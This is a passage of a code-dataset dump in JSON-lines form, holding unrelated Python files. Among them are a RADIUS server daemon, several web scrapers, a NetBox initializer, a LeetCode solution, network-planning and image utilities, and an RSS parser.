newlines and numbers\n\t#text = re.sub(\"0|1|2|3|4|5|6|7|8|9\", \"\", sentence.replace('\\\\n',' '))\n\t# spell correct the text and make unicode consistent\n\ttext = unidecode(language_check.correct(text, meta_dict[\"language_check_tool\"].check(text)).lower())\n\t# remove all punctuation\n\t#text = text.translate(str.maketrans('','',string.punctuation))\n\t# get treebank tokens\n\ttokens = word_tokenize(text)\n\t# get part of speech tags\n\ttags = nltk.pos_tag(tokens)\n\t# get lemmas and sentiment for tokens\n\tlemmas = [get_lemma(meta_dict, tag) for tag in tags]\n\tif len(lemmas) >= 3 and np.sum(np.array([x[0] for x in lemmas[-3:]]) == np.array(['make', 'on', 'imgur'])) >= 2:\n\t\tlemmas = lemmas[:-3]\n\treturn lemmas","sub_path":"cleaning/cleaning_functions.py","file_name":"cleaning_functions.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"221753954","text":"#!/usr/bin/env python\n\n\"\"\"\nRead showers from CORSIKA files and write to I3 files\n\"\"\"\n\nfrom os.path import expandvars\nfrom argparse import ArgumentParser\nparser = ArgumentParser(description=__doc__)\nparser.add_argument('-i', '--infile', nargs='*', help=\"Input CORSIKA files\",\n default=[expandvars('$I3_TESTDATA/DAT010000')])\nparser.add_argument('-o', '--outfile', help=\"Output I3 file\",\n default=\"DAT010000.i3.bz2\")\nparser.add_argument('-g', '--gcdfile', default=\"\", help=\"GCD file to prepend\")\nparser.add_argument('-n', '--nevents', default=1, type=int, help=\"Number of simulated events per file\")\nopts = parser.parse_args()\n\nfrom icecube import icetray, dataclasses, dataio, phys_services, corsika_reader\nfrom I3Tray import I3Tray\n\ntray = I3Tray()\n\ntray.context['I3FileStager'] = dataio.get_stagers()\ntray.context['I3RandomService'] = phys_services.I3GSLRandomService(42)\ntray.AddModule('I3CORSIKAReader',\n FilenameList = opts.infile,\n Prefix = opts.gcdfile,\n NEvents = opts.nevents)\n\ntray.Add(\"I3Writer\", Streams=map(icetray.I3Frame.Stream, 'QP'),\n filename=opts.outfile)\n\ntray.Execute()\n","sub_path":"corsika-reader/resources/examples/corsika2i3.py","file_name":"corsika2i3.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14249543","text":"from typing import List\n\n\nclass Node(object):\n def __init__(self, val):\n self.val = val\n self.next = None\n\n\nclass Solution:\n is_true = True\n\n def canFinish(self, class_num: int, pre_class: List[List[int]]) -> bool:\n ingress 
= [[0 for i in range(class_num)] for i in range(class_num)]\n one_cnt = 0\n\n for pair in pre_class:\n cur, pre = pair[0], pair[1]\n ingress[pre][cur] += 1\n one_cnt += 1\n\n queue = []\n # enqueue the nodes whose in-degree is 0\n for i in range(class_num):\n ingress_sum = sum([val[i] for val in ingress]) # get the elements of column i\n j = 0\n if ingress_sum == 0:\n queue.append(i)\n\n i = class_num\n # Kahn's algorithm: repeatedly remove nodes whose in-degree drops to 0\n while len(queue) > 0:\n class_order = queue.pop()\n\n for k in range(class_num):\n if ingress[class_order][k] > 0:\n ingress[class_order][k] -= 1\n one_cnt -= 1\n # get the column elements\n ingress_col = [val[k] for val in ingress]\n # get the row elements\n ingress_row = ingress[k]\n if sum(ingress_col) == 0 and sum(ingress_row) > 0:\n queue.append(k)\n\n if one_cnt == 0:\n return True\n return False\n\nif __name__ == '__main__':\n so = Solution()\n num = 2\n pre = [[1, 0], [0, 1]]\n num = 2\n pre = [[1, 0]]\n # num = 3\n # pre = [[1, 0], [1, 2], [0, 1]]\n # num = 3\n # pre = [[1, 0], [2, 1]]\n res = so.canFinish(num, pre)\n print(res)\n","sub_path":"leetcode_3/class_table.py","file_name":"class_table.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"24557223","text":"#!/usr/local/bin/python\n\"\"\"\nVoIP Radius\nData Tech Labs radius server.\nMade specially for VoIP needs.\n\"\"\"\n\n# HeadURL\t\t$HeadURL: file:///Z:/backup/svn/bsdradius/tags/release20050113_v_0_1_0/bsdradiusd.py $\n# Author:\t\t$Author: valts $\n# File version:\t$Revision: 124 $\n# Last changes:\t$Date: 2006-01-13 19:50:15 +0200 (Pk, 13 Jan 2006) $\n\n__version__ = 'BSD Radius 1.0.0'\n\n\n# import modules\nimport sys, signal\nimport os\nimport time\n\nsys.path.insert(0, './lib')\nsys.path.insert(0, './modules')\nimport BsdRadiusServer\nimport logging\nimport DatabaseConnection\nimport misc\nimport modules\nimport Config\nfrom pyrad import dictionary\nfrom ConfigDb import ConfigDb\nfrom ConfigCli import ConfigCli\nfrom configDefaults import defaultOptions, defaultTypes\nfrom logging import *\n\n\n# make sure that keyboard interrupt stops our server\n# and clean up before exiting\nsignal.signal(signal.SIGINT, misc.killSignalHandler)\nsignal.signal(signal.SIGTERM, misc.killSignalHandler)\n\n# parse command line options\nconfCli = ConfigCli(__version__)\n\n# set logging attributes\nif 'SERVER' in confCli:\n\tsrvConf = confCli['SERVER']\n\tif 'debug_mode' in srvConf and srvConf['debug_mode']:\n\t\tconfCli['SERVER']['foreground'] = True\n\t\tconfCli['SERVER']['no_threads'] = True\n\t\tconfCli['SERVER']['log_to_screen'] = True\n\tif 'log_to_screen' in srvConf and srvConf['log_to_screen']:\n\t\t# enable logging to screen \n\t\tlogging.logToScreen = True\n\tif 'log_client' in srvConf and srvConf['log_client']:\n\t\t# restrict all threads from logging\n\t\tinfo ('--- Enabling threads logging restrictions ---')\n\t\tlogging.restrictThreads = True\n\t\t# add this (main) thread to unrestricted threads to allow print log messages\n\t\tmisc.addUnrestrictedThread()\n\ninfo ('--- Reading configuration ---')\n# get config file path\nif 'PATHS' in confCli and 'config_file' in confCli['PATHS']:\n\tConfig.configFiles[0] = confCli['PATHS']['config_file']\n# read config file\nConfig.readFiles = Config.main_config.read(Config.configFiles)\n# check if all necessary files are read\nif Config.configFiles != Config.readFiles:\n\tmisc.quit(\"Can not read required configuration files\", 1)\n\n# overwrite configfile attributes with command line ones\nconfCli.applyOptions()\n\n# print config\nmain_config = Config.main_config\ndebug 
(main_config)\n\n# fork and run as daemon\nif not main_config['SERVER']['foreground']:\n\tinfo ('Daemonizing...')\n\tchildProcId = os.fork()\n\tif childProcId != 0:\n\t\tsys.exit(0)\n\n# store pid in file\nuser = main_config['SERVER']['user']\ngroup = main_config['SERVER']['group']\nrunDirPath = main_config['PATHS']['run_dir']\nif not misc.checkDir(runDirPath, user = user, group = group):\n\tmisc.quit(\"Checking %s directory failed\" % runDirPath, 1)\nmisc.makePidfile()\n\n# open log file\nif main_config['PATHS']['server_log_file'] and main_config['SERVER']['log_to_file']:\n\tlogDirPath = main_config['PATHS']['log_dir']\n\tlogFilePath = main_config['PATHS']['server_log_file']\n\tinfo ('--- Opening log file ---')\n\t# check and/or create log directory\n\tif not misc.checkDir(logDirPath, user = user, group = group):\n\t\tmisc.quit(\"Checking %s directory failed\" % logDirPath, 1)\n\t# open file\n\ttry:\n\t\tlogging.logFile = open(logFilePath, 'a+')\n\t\tmisc.setOwner(logFilePath, user, group)\n\texcept:\n\t\tmisc.printExceptionError()\n\t\tquit('Can not open logfile')\n\n# parse dictionaries\ninfo ('--- Parsing dictionary files ---')\ndict = dictionary.Dictionary('dictionaries/dictionary')\n\n# connect to database\nif main_config['DATABASE']['enable']:\n\tinfo ('--- Connecting to database ---')\n\t# set driver name\n\tif main_config['DATABASE']['type'] == 'postgresql':\n\t\tDatabaseConnection.dbadapterName = 'psycopg'\n\telse:\n\t\tDatabaseConnection.dbadapterName = 'MySQLdb'\n\t\t\n\t# connect to host and store connection globally available\n\ttry:\n\t\tDatabaseConnection.dbh1 = DatabaseConnection.DatabaseConnection('dbh1')\n\t\tDatabaseConnection.dbh1.connect (\n\t\t\thost = main_config['DATABASE']['host'],\n\t\t\tuser = main_config['DATABASE']['user'],\n\t\t\tpassword = main_config['DATABASE']['pass'],\n\t\t\tdbname = main_config['DATABASE']['name'] )\n\texcept:\n\t\tmisc.printExceptionError()\n\t\tmisc.quit(\"Error connecting to database. 
Check DATABASE section in config file.\", 1)\n\n# start server itself\nauthport = main_config[\"SERVER\"][\"auth_port\"]\nacctport = main_config[\"SERVER\"][\"acct_port\"]\nsrv = BsdRadiusServer.BsdRadiusServer(dict = dict, authport = authport, \\\n\tacctport = acctport)\n\n# add valid server client hosts from file\nif main_config['PATHS']['clients_file']:\n\tinfo ('--- Reading server clients from file ---')\n\tclientsConf = Config.Config()\n\tclientsConf.read([main_config['PATHS']['clients_file']])\n\tsrv.addClientHosts(clientsConf)\n# add valid server client hosts from DB\n# overwrite hosts from file\nif main_config['DATABASE']['enable']:\n\tinfo ('--- Reading server clients from DB ---')\n\tconfDb = ConfigDb(DatabaseConnection.dbh1)\n\tconfDb.ReadClients()\n\tsrv.addClientHosts(confDb['CLIENTS'])\n\t\t\t\ndebug ('--- Clients: ---')\nfor addr in srv.hosts:\n\tdebug ('%s: %s' % (addr, srv.hosts[addr].name))\n\t\n# bind to IP address (default: all)\nsrv.BindToAddress(main_config['SERVER']['home'])\n\n# switch to nonprivileged user\nmisc.switchUid(user, group)\n\n# Load BSD Radius server modules.\n# Do it just before starting the server to provide modules with maximum info.\ninfo ('--- Reading module configuration ---')\nmodules.readConfig(main_config['PATHS']['modules_file'])\nmodules.readConfig(main_config['PATHS']['user_modules_file'])\ndebug ('Module configuration:')\ndebug (modules.modulesConfig)\ninfo ('--- Loading modules ---')\nmodules.loadModules()\ninfo ('--- Executing startup modules ---')\nmodules.execStartupModules()\n\n# run server\ninfo (\"--- Starting server ---\")\nsrv.Run()\n\n# do some maintenace tasks\neverythingOk = True\ndbRefreshCounter = 0\nmain_config['DATABASE']['refresh_rate'] = 10\nwhile everythingOk:\n\ttime.sleep(1)\n\t\n\t# refresh radius server clients from DB\n\tif main_config['DATABASE']['enable']:\n\t\tdbRefreshCounter += 1\n\t\tif dbRefreshCounter >= main_config['DATABASE']['refresh_rate']:\n\t\t\t#info ('Refreshing config from DB')\n\t\t\t#debug ('I was waiting for it %s seconds :)' % dbRefreshCounter)\n\t\t\tdbRefreshCounter = 0\n\t\t\tconfDb.ReadClients()\n\t\t\tsrv.addClientHosts(confDb['CLIENTS'])\n\t\t\t# print only changed clients\n\n\n# exit program\nmisc.quit()\n","sub_path":"bsdradius/tags/release20050113_v_0_1_0/bsdradiusd.py","file_name":"bsdradiusd.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"615124651","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 17 07:27:22 2017\n\n@author: liyan\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom gurobipy import *\nimport networkx as nx\nfrom itertools import combinations\nimport pickle\nimport operator\n\n# Load cost matrix, then make the unit from number of spans to km\ncost_matrix = pd.read_csv('CoronetCostMatrix.csv', header=None)\ncost_matrix = cost_matrix*100\ncost_matrix[np.isinf(cost_matrix)] = 0\ncost_matrix = cost_matrix.as_matrix()\n#cost_matrix = cost_matrix.astype(int)\n\n# Define the transmission reach, the unit is km\ntr = 2000\n\nclass BenchmarkPredo(object):\n '''Solve Bathula's benchmark\n '''\n \n def __init__(self, topology_matrix, tr):\n '''\n Initialize the topology, transmission reach, and cost. 
Also calculate \n the shortest paths.\n '''\n self.topology_matrix = topology_matrix\n self.tr = tr\n \n # Create networkx graph object for the network topology\n self.graph = nx.to_networkx_graph(topology_matrix,\n create_using=nx.DiGraph())\n # Calculate APSP costs, and convert it to numpy matrix\n self.graph_apsp_cost = pd.DataFrame(\n nx.all_pairs_dijkstra_path_length(self.graph)).as_matrix()\n \n # Calculate all the shortest paths for all pairs in the graph\n self.graph_apsp_paths = {(i, j):\n list(nx.all_shortest_paths(self.graph, i, j))\n for i in self.graph.nodes() for j in self.graph.nodes() if i3:\n tmp_nodes.update([k[x] for x in p[1:-1]])\n# print([k[x] for x in p])\n self.candidate_RS_per_node_pair[(i, j)] = tmp_nodes\n \n self.candidate_RS_sum = sum(len(self.candidate_RS_per_node_pair[k]) \n for k in self.node_pairs)\n self.candidate_RS_per_node = {}\n self.candidate_RS_per_node_normalized = {}\n for n in self.graph.nodes():\n self.candidate_RS_per_node[n] = 0\n for i, j in self.node_pairs:\n if n in self.candidate_RS_per_node_pair[(i, j)]:\n self.candidate_RS_per_node[n] += 1\n self.candidate_RS_per_node_normalized[n] = \\\n self.candidate_RS_per_node[n]/self.candidate_RS_sum\n \n # Rank nodes according to the likelihood\n self.RS_likelihood_ranked = sorted(\n self.candidate_RS_per_node_normalized.items(), \n key=operator.itemgetter(1), reverse=True)\n \ndef save_pickle(file_name, data):\n '''File name must ends with .pkl\n '''\n with open(file_name, 'wb') as f:\n pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)\n \ndef read_pickle(file_name):\n with open(file_name, 'rb') as f:\n data = pickle.load(f)\n \n return data\n\ndef save_json(file_name, data):\n '''Save data with json\n '''\n with open(file_name, 'w') as f:\n json.dump(data, f)\n \ndef read_json(file_name):\n with open(file_name, 'r') as f:\n data = json.load(f)\n \n return data\n \n \nif __name__=='__main__':\n benchmark = BenchmarkPredo(cost_matrix, tr)\n x = pd.DataFrame(benchmark.RS_likelihood_ranked)\n x.columns = ['node', 'likelihood']\n x.to_csv('Predo_routing_and_reach.csv', index=None)","sub_path":"ext/benchmark-predo/bm1.py","file_name":"bm1.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"247555747","text":"import logging\n\n\nfrom sqlalchemy import desc\nfrom sqlalchemy import asc\nfrom sqlalchemy import or_,and_\nfrom sqlalchemy.dialects import mysql\nfrom sqlalchemy.sql import text, func\n\nfrom proxyip.db.base import get_session\nfrom proxyip.db.base import get_engine\nfrom proxyip.model.ip import Proxyip\n\nLOG = logging.getLogger(__name__)\n\ndef model_query(model, *args, **kwargs):\n session = kwargs.get('session') or get_session()\n read_deleted = kwargs.get('read_deleted') or 'no'\n\n query = session.query(model, *args)\n\n if read_deleted == 'no':\n query = query.filter_by(deleted=0)\n elif read_deleted == 'yes':\n pass # omit the filter to include deleted and active\n elif read_deleted == 'only':\n query = query.filter_by(deleted=1)\n else:\n raise Exception(\n _(\"Unrecognized read_deleted value '%s'\") % read_deleted)\n return query\n\n\ndef create_ip(ip):\n try:\n ip.save()\n except Exception as e:\n LOG.error(e)\n\n\ndef update_ip(ip):\n ip.save()\n\ndef count():\n result = model_query(Proxyip).count()\n return result\n\ndef query_all(offset=0,limit=10):\n result = model_query(Proxyip).offset(offset).limit(limit).all()\n return result\n\ndef query_by_ip_port(ip,port):\n result = 
model_query(Proxyip).filter_by(ip=ip,port=port).first()\n return result\n \n","sub_path":"proxyip/model/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"160213721","text":"# -*- coding:utf-8 -*-\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nfrom scrapy.spider import Spider\nfrom scrapy.http import Request\nfrom scrapy.http import FormRequest\nimport logging\nfrom scrapy.utils.project import get_project_settings\nfrom crawler.common.util import Util\nfrom crawler.items import EpisodeItem, UserItem\nfrom crawler.db.db_mgr import DbManager\nfrom datetime import datetime\nimport traceback\nimport re\nimport json\n\nclass QqCatSpider(Spider):\n name = \"qq_cat\"\n pipelines = ['MysqlStorePipeline']\n spider_id = \"4194304\"\n site_id = \"16\"\n format_id = 2\n mgr = DbManager.instance()\n\n def __init__(self, *args, **kwargs):\n super(QqCatSpider, self).__init__(*args, **kwargs)\n cat_urls = kwargs.get('cats')\n if cat_urls:\n cat_urls = json.loads(cat_urls)\n else:\n cat_urls = self.mgr.get_cat_url('qq')\n if cat_urls:\n self._cat_urls = cat_urls\n else:\n self._cat_urls = []\n\n def start_requests(self):\n try:\n items = []\n for cat in self._cat_urls:\n items.append(Request(url=cat['url'], callback=self.parse_page, meta={'cat_id': cat['id'], 'cat_name': cat['cat_name'], 'audit': cat['audit'], 'priority': cat['priority']}))\n url = cat.pop('url')\n r = Request(url=url, callback=self.parse_page)\n r.meta.update({'cat': cat})\n items.append(r)\n return items\n except Exception as e:\n logging.log(logging.ERROR, traceback.format_exc())\n\n def parse_page(self, response):\n try:\n logging.log(logging.INFO, 'page:%s' % response.request.url)\n cat = response.request.meta['cat']\n items = []\n\n qq_v = response.xpath('//div[@class=\"mod_cont\"]/ul/li')\n for v in qq_v:\n urls = v.xpath('./h6/a/@href').extract()\n titles = v.xpath('./h6/a/@text').extract()\n thumb_urls = v.xpath('./a/img/@src').extract()\n durations = v.xpath('./a/div/span[@class=\"mod_version\"]/text()').extract()\n playeds = v.xpath('./p/span/text()').extract()\n\n title = titles[0] if titles else None\n thumb_url = thumb_urls[0] if thumb_urls else None\n duration = Util.get_qq_duration(durations[0]) if durations else None\n played = Util.normalize_played(Util.normalize_vp(playeds[0])) if playeds else None\n if urls:\n r = Request(url=urls[0], callback=self.parse_episode)\n d = {'title': title, 'thumb_url': thumb_url, 'duration': duration,'played': played}\n d.update(order)\n r.meta.update({'order': d})\n items.append(r)\n return items\n except Exception as e:\n logging.log(logging.ERROR, traceback.format_exc())\n\n def parse_episode(self, response):\n try:\n logging.log(logging.INFO, 'episode:%s' % response.request.url)\n order = response.request.meta['order']\n items = []\n\n #video info\n #tags = response.xpath('//p[@class=\"info_tags\"]//a/@title').extract()\n #descriptions = response.xpath('//div[@class=\"info_summary cf\"]/span/text()').extract()\n\n ep_item = EpisodeItem()\n ep_item['show_id'] = Util.get_qq_showid(response.request.url)\n #if tags:\n # ep_item['tag'] = Util.unquote(tags[0]).rstrip('|')\n #if descriptions:\n # ep_item['description'] = descriptions[0]\n for k, v in order.items():\n if k == 'user':\n ep_item['category'] = v\n elif k == 'show_id':\n ep_item['owner_show_id'] = v\n else:\n ep_item[k] = v\n\n ep_item['spider_id'] = self.spider_id\n ep_item['site_id'] = 
self.site_id\n ep_item['url'] = response.request.url\n ep_item['format_id'] = self.format_id\n items.append(ep_item)\n\n return items\n except Exception as e:\n logging.log(logging.ERROR, traceback.format_exc())\n\n","sub_path":"crawler/crawler/crawler/spiders/qq_cat.py","file_name":"qq_cat.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"115427184","text":"from secret import RequestLinkRestaurant,RequestLinkMealDelivery,RequestLinkMealTakeaway,RequestLinkBar,RequestLinkCafe, MongoURI\nimport requests\nimport json\nfrom pymongo import MongoClient\nclient = MongoClient(MongoURI)\ndb = client['ciborestaurants']\ncollection = db['ScriptTest']\n\nplacesR = requests.request('GET', RequestLinkRestaurant)\nplacesR = json.loads(placesR.text)\nplacesR = placesR[\"results\"]\n\nplacesMD = requests.request('GET', RequestLinkMealDelivery)\nplacesMD = json.loads(placesMD.text)\nplacesMD = placesMD[\"results\"]\n\nplacesMT = requests.request('GET', RequestLinkMealTakeaway)\nplacesMT = json.loads(placesMT.text)\nplacesMT = placesMT[\"results\"]\n\nplacesB = requests.request('GET', RequestLinkBar)\nplacesB = json.loads(placesB.text)\nplacesB = placesB[\"results\"]\n\nplacesC = requests.request('GET', RequestLinkCafe)\nplacesC = json.loads(placesC.text)\nplacesC = placesC[\"results\"]\n\n\nposts = db.Catalog\nfor i in range(len(placesR)):\n placesR[i].pop('types',None)\n placesR[i].pop('scope',None)\n placesR[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesR[i]).inserted_id\n print(placesR[i]['name'])\n print(post_id)\n\nfor i in range(len(placesMD)):\n placesMD[i].pop('types',None)\n placesMD[i].pop('scope',None)\n placesMD[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesMD[i]).inserted_id\n print(placesMD[i]['name'])\n print(post_id)\n\nfor i in range(len(placesMT)):\n placesMT[i].pop('types',None)\n placesMT[i].pop('scope',None)\n placesMT[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesMT[i]).inserted_id\n print(placesMT[i]['name'])\n print(post_id)\n\nfor i in range(len(placesB)):\n placesB[i].pop('types',None)\n placesB[i].pop('scope',None)\n placesB[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesB[i]).inserted_id\n print(placesB[i]['name'])\n print(post_id)\n\nfor i in range(len(placesC)):\n placesC[i].pop('types',None)\n placesC[i].pop('scope',None)\n placesC[i]['hashtags'] = {\n '#breakfast' : 0,\n '#gourmet' : 0,\n '#delicious' : 0,\n '#food' : 0,\n '#healthy' : 0,\n '#hungry' : 0,\n '#bangforbuck' : 0,\n '#sweet' : 0,\n '#yummy' : 0,\n '#fastfood' : 0\n }\n post_id = posts.insert_one(placesC[i]).inserted_id\n print(placesC[i]['name'])\n print(post_id) 
","sub_path":"scripts/getRestaurantsList.py","file_name":"getRestaurantsList.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"406635448","text":"from dcim.models import Site\nfrom ipam.models import VLANGroup\nfrom extras.models import CustomField, CustomFieldValue\nfrom ruamel.yaml import YAML\n\nfrom pathlib import Path\nimport sys\n\nfile = Path('/opt/netbox/initializers/vlan_groups.yml')\nif not file.is_file():\n sys.exit()\n\nwith file.open('r') as stream:\n yaml = YAML(typ='safe')\n vlan_groups = yaml.load(stream)\n\n optional_assocs = {\n 'site': (Site, 'name')\n }\n\n if vlan_groups is not None:\n for params in vlan_groups:\n custom_fields = params.pop('custom_fields', None)\n\n for assoc, details in optional_assocs.items():\n if assoc in params:\n model, field = details\n query = { field: params.pop(assoc) }\n\n params[assoc] = model.objects.get(**query)\n\n vlan_group, created = VLANGroup.objects.get_or_create(**params)\n\n if created:\n if custom_fields is not None:\n for cf_name, cf_value in custom_fields.items():\n custom_field = CustomField.objects.get(name=cf_name)\n custom_field_value = CustomFieldValue.objects.create(\n field=custom_field,\n obj=vlan_group,\n value=cf_value\n )\n\n vlan_group.custom_field_values.add(custom_field_value)\n\n print(\"🏘️ Created VLAN Group\", vlan_group.name)\n","sub_path":"startup_scripts/200_vlan_groups.py","file_name":"200_vlan_groups.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"120484975","text":"import numpy as np\nimport base64\nimport sys\nsys.path.append('.')\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef rgbdFromRequest(r):\n img_rgb = rgbFromRequest(r)\n depth_str = r['d']\n intr = r['intr']\n d_buff = base64.b64decode(depth_str)\n nparr_depth = np.frombuffer(d_buff, np.float32)\n nparr_depth = np.reshape(nparr_depth, (intr[\"height\"], intr[\"width\"]))\n return img_rgb, nparr_depth\n\ndef dFromRequest(r):\n depth_str = r['d']\n intr = r['intr']\n d_buff = base64.b64decode(depth_str)\n nparr_depth = np.frombuffer(d_buff, np.float32)\n nparr_depth = np.reshape(nparr_depth, (intr[\"height\"], intr[\"width\"]))\n return nparr_depth\n\n\ndef rgbdSegmaskFromRequest(r):\n img, d = rgbdFromRequest(r)\n intr = r['intr']\n s_str = r['segmask']\n s_buff = base64.b64decode(s_str)\n nparr_s = np.frombuffer(s_buff, np.uint8)\n nparr_s = np.reshape(nparr_s, (intr['height'], intr['width']))\n return img, d, nparr_s\n\n\ndef rgbFromRequest(r):\n rgb_str = r['rgb']\n encoded = r['encoded']\n intr = r['intr']\n rgb_buff = base64.b64decode(rgb_str)\n nparr_rgb = np.frombuffer(rgb_buff, np.uint8)\n if encoded:\n img_rgb = cv2.imdecode(nparr_rgb, cv2.IMREAD_COLOR)\n else:\n img_rgb = np.reshape(nparr_rgb, (intr[\"height\"], intr[\"width\"], 3))\n return img_rgb\n\n\n\ndef plotImage(img, filename=\"image.png\"):\n plt.figure()\n plt.imshow(img)\n plt.savefig(filename)","sub_path":"webserver/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152940949","text":"import os\n\niteritems = lambda d, *args, **kwargs: iter(d.items(*args, **kwargs))\n\n\ndef _find_common_roots(paths):\n \"\"\"Out of some paths it finds the common roots that need monitoring.\"\"\"\n paths = [x.split(os.path.sep) for x in paths]\n import pdb; 
pdb.set_trace()\n root = {}\n for chunks in sorted(paths, key=len, reverse=True):\n print('root {}'.format(root))\n node = root\n print('chunks {}'.format(chunks))\n for chunk in chunks:\n node = node.setdefault(chunk, {})\n print('node in loop {}'.format(node))\n node.clear()\n print('node = {}'.format(node))\n print('root = {}'.format(root))\n\n rv = set()\n\n def _walk(node, path):\n for prefix, child in iteritems(node):\n _walk(child, path + (prefix,))\n if not node:\n rv.add('/'.join(path))\n _walk(root, ())\n return rv\n\n\nprint(_find_common_roots(['/home/ye/test', '/home/ye/test/1']))","sub_path":"daily/04_29_18_common_roots.py","file_name":"04_29_18_common_roots.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"299439428","text":"import win32gui, win32api, win32con,win32process,psutil\nclass windowOperate(object):\n @staticmethod\n def click_position(hwd, x_position, y_position):\n long_position = win32api.MAKELONG(x_position, y_position)\n win32api.PostMessage(hwd, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, long_position)\n win32api.PostMessage(hwd, win32con.WM_LBUTTONUP, win32con.MK_LBUTTON, long_position)\n\n @staticmethod\n def get_handle_by_process_id(pid):\n def callback(hwnd, hwnds):\n if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):\n _, nID = win32process.GetWindowThreadProcessId(hwnd)\n if nID == pid:\n hwnds.append(hwnd)\n return True\n\n results = []\n win32gui.EnumWindows(callback, results)\n if results:\n return results[0]\n else:\n return None\n\n @staticmethod\n def getPidByName(Str):\n pidList = []\n for pid in psutil.process_iter():\n if pid.name() == Str:\n pidList.append(pid.pid)\n return pidList\n\n @staticmethod\n def get_handle_by_process_name(processname):\n pids = windowOperate.getPidByName(processname)\n if pids:\n return windowOperate.get_handle_by_process_id(pids[0])\n else:\n return None","sub_path":"src/util/proxyAgent/windowOperate.py","file_name":"windowOperate.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"382408304","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n#\n# Simple XML parser for the RSS channel from BarraPunto\n# Jesus M. Gonzalez-Barahona\n# jgb @ gsyc.es\n# TSAI and SAT subjects (Universidad Rey Juan Carlos)\n# September 2009\n#\n# Just prints the news (and urls) in BarraPunto.com,\n# after reading the corresponding RSS channel.\n\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nimport sys\nimport urllib.request\n\n\n# Para ejecutarlo:\n# python2.7 xml-parser-barrapunto.py >barrapunto.html\n# lo ultimo es para que la salida estandar la guarde\n# en un fichero\n\nclass myContentHandler(ContentHandler):\n texto = \"\"\n \n def __init__(self):\n self.texto += \"\"\n self.inItem = False\n self.inContent = False\n self.theContent = \"\"\n\n def startElement(self, name, attrs):\n if name == 'item':\n self.inItem = True\n elif self.inItem:\n if name == 'title':\n self.inContent = True\n elif name == 'link':\n self.inContent = True\n\n def endElement(self, name):\n if name == 'item':\n self.inItem = False\n elif self.inItem:\n if name == 'title':\n self.texto += (\"
Title: \" + self.theContent + \".\")\n # To avoid Unicode trouble\n self.inContent = False\n self.theContent = \"\"\n elif name == 'link':\n self.texto += (\"Link: \" + self.theContent)\n self.inContent = False\n self.theContent = \"\"\n\n def characters(self, chars):\n if self.inContent:\n self.theContent = self.theContent + chars\n","sub_path":"Version_1/xml_parser_barrapunto.py","file_name":"xml_parser_barrapunto.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"569635051","text":"#A reference type is a variable where we store the reference to where\n#the variable is stored in the computer, not the value\n\ndef doThis(a):\n\ta = a + 1\n\n\ndef doThat(a):\n\ta = a + 1\n\treturn a\n\ndef doSomething(nums):\n\tnums[0] = 999\n\nvalue = 1 \t#This is a primitive type int. All programming languages deal\n\t\t\t#with primitive types the same way. \nprint(\"Before Function: \",value)\ndoThis(value)\nprint(\"After Function: \",value)\nprint(\"********************\")\n#Value does not change because it is a primitive type. We are making a duplicate\n#that we pass to the function. The only way for that change to carry\n#over is to pass the value 